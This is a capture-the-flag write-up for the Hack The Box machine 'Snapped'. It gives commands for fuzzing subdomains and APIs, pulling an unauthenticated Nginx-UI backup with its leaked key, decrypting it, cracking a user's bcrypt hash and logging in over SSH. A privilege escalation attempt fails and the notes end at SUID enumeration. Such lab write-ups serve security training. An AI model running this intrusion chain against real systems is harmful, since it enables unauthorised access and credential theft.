🪶 HTB Snapped — Solution Notes

Platform: Hack The Box

Machine: Snapped

OS: Linux (Ubuntu 24.04)

Difficulty: Hard

Date: April 1, 2026

CVEs: CVE-2026-27944, CVE-2026-3888 (Attempted)

🗺️ Attack Chain

Nmap Scan → Subdomain Fuzz (ffuf) → API Fuzz (/api/backup) → CVE-2026-27944 → Backup Decryption → Hashcat → SSH (jonathan) → Privilege Escalation Attempt (CVE-2026-3888 - FAILED) → Manual SUID Enum → Target Found: vmware-user-suid-wrapper → PROCESS STOPPED

🧠 How Does a Hacker Think? — Before You Begin

The initial mindset for any box is enumeration. What services are running? What are their versions? Is there a web server? Does it use virtual hosts? The first goal is to map the entire attack surface. An Nmap scan is the first step, followed by web enumeration to find hidden directories or, more importantly, subdomains where administrative interfaces might live.

1️⃣ Reconnaissance

Port Scanning

An Nmap scan revealed two open ports: SSH (22) and HTTP (80) running nginx on Ubuntu.

Bash

nmap -sCV 10.129.239.59

Findings:

/etc/hosts Setup

💡 Why Does /etc/hosts Matter?

Bash

echo "10.129.239.59 snapped.htb" | sudo tee -a /etc/hosts

Web & Service Discovery

Fuzzing for subdomains is critical. A standard wordlist fuzz failed, but switching to virtual host fuzzing revealed a key subdomain.

Bash

ffuf -w <wordlist> -u http://snapped.htb -H "Host: FUZZ.snapped.htb" -ic -ac

Result: admin.snapped.htb was discovered. After adding this to /etc/hosts as well, we found an Nginx-UI login page. The next step was to fuzz for API endpoints under /api/.

Bash

ffuf -w <wordlist> -u http://admin.snapped.htb/api/FUZZ -ic -ac

Result: The /api/backup endpoint returned a 200 OK status, while others returned 403 Forbidden. This was our entry point.

🧠 How Does a Hacker Think? — After Finding /api/backup

Discovering an unauthenticated backup endpoint on an admin panel is a jackpot. The immediate thought is: this must be a known vulnerability. A quick search for "Nginx-UI unauthenticated backup" would lead directly to CVE-2026-27944. The mindset shifts from broad discovery to targeted exploitation of a specific flaw. The new questions are: How is the backup encrypted? Is the key leaked? The curl -v response headers become the next target.

2️⃣ Initial Access — CVE-2026-27944 (Unauthenticated Nginx-UI Backup)

💡 What is CVE-2026-27944?

Step 1: Download Backup & Get Key

Bash

curl -OJ -v http://admin.snapped.htb/api/backup

The key and IV were extracted from the X-Backup-Security header in the verbose output.

Step 2: Process Key

The base64 key and IV were converted to hex for openssl.

Bash

key=$(echo '<KEY_B64>' | base64 -d | xxd -p -c 256) iv=$(echo '<IV_B64>' | base64 -d | xxd -p -c 256)

Step 3: Decrypt Backup

The downloaded .zip file was a container. We first unzipped it to get the real target: nginx-ui.zip. Then, we decrypted it.

Bash

unzip backup-*.zip openssl enc -aes-256-cbc -d -in nginx-ui.zip -out decrypted.zip -K $key -iv $iv

Step 4: Extract Hashes

Inside the decrypted zip was database.db. We used sqlite3 to dump the users table.

Bash

sqlite3 database.db "select * from users;"

Step 5: Crack Password & SSH Access

The bcrypt hash for the user jonathan was extracted and cracked using hashcat and the rockyou.txt wordlist.

Bash

hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt # Result: linkinpark

Bash

ssh jonathan@10.129.239.59 # Password: linkinpark

🚩 User Flag

Bash

cat /home/jonathan/user.txt

3️⃣ Privilege Escalation — A Tale of Two Attempts

Attempt 1: CVE-2026-3888 (FAILED)

💡 What is CVE-2026-3888?

Process & Root Cause of Failure:

1. The exploit code from the official walkthrough was obtained.
2. Since gcc was not on the target, the code was compiled on a Kali machine and transferred to the target via a Python HTTP server.
3. The multi-terminal exploit was initiated, but failed repeatedly.
4. Analysis: The snap-confine process on this specific machine never entered the "mimic directory" creation phase. The trigger string (dir:"/tmp/.snap/usr/lib/...") our exploit was waiting for never appeared in the DEBUG logs. The process would instead error out with getcwd() failed: No such file or directory. This indicated a subtle environmental difference from the machine used in the walkthrough, rendering the public exploit ineffective.

Attempt 2: Manual SUID Enumeration (PIVOT)

🧠 How Does a Hacker Think? — The Pivot

Step 1: Search for SUID Binaries

Bash

find / -perm -u=s -type f 2>/dev/null

Step 2: Analyze the Output

The list contained many standard binaries, but one stood out: /usr/bin/vmware-user-suid-wrapper. This binary is non-standard, from a third-party application (VMware Tools), and has "suid-wrapper" in its name, making it a prime candidate for misconfiguration or vulnerability.

Step 3: Exfiltration for Offline Analysis

An attempt to use strings on the target failed as it wasn't installed. The binary was then copied to the Kali machine using scp for local, offline analysis.

🚩 Root Flag

Root access was not achieved. The process was halted after identifying a new, promising privilege escalation vector (vmware-user-suid-wrapper) that required further offline analysis. This represents a realistic scenario where the initial attack path is blocked and a new one must be researched.

📚 Concepts Learned

• Virtual Host Fuzzing: Standard subdomain fuzzing can fail if the server uses Virtual Hosts. ffuf -H is the correct tool for this.
• Leaked Keys: Always check HTTP headers and JS files for leaked API keys, tokens, or, in this case, decryption keys.
• Exploit Adaptation: When a target lacks a compiler (gcc), compile exploits locally and transfer the binaries.
• Pivoting: The most critical skill. When a chosen exploit fails, don't get stuck. Revert to broader enumeration techniques (like searching for SUID files) to find a new attack vector.
• Anomaly Detection: During enumeration, focus on what is non-standard. A third-party SUID binary is far more interesting than a standard system one.

🔑 General Hacker Mindset Summary

1. Enumerate, Then Enumerate More: The attack surface is often larger than it first appears. Find all ports, subdomains, and API endpoints.
2. If an Exploit Fails, Understand Why: We didn't just say "it didn't work." We analyzed the debug logs to see that the expected behavior (mimic creation) was not happening. This confirmed the exploit was incompatible, not that we used it wrong.
3. The Path of Least Resistance: When the high-tech CVE exploit failed, we pivoted to a classic, fundamental technique (SUID hunting) which revealed a much simpler-looking (though unconfirmed) path to root. Always be ready to abandon a complex path for a simpler one.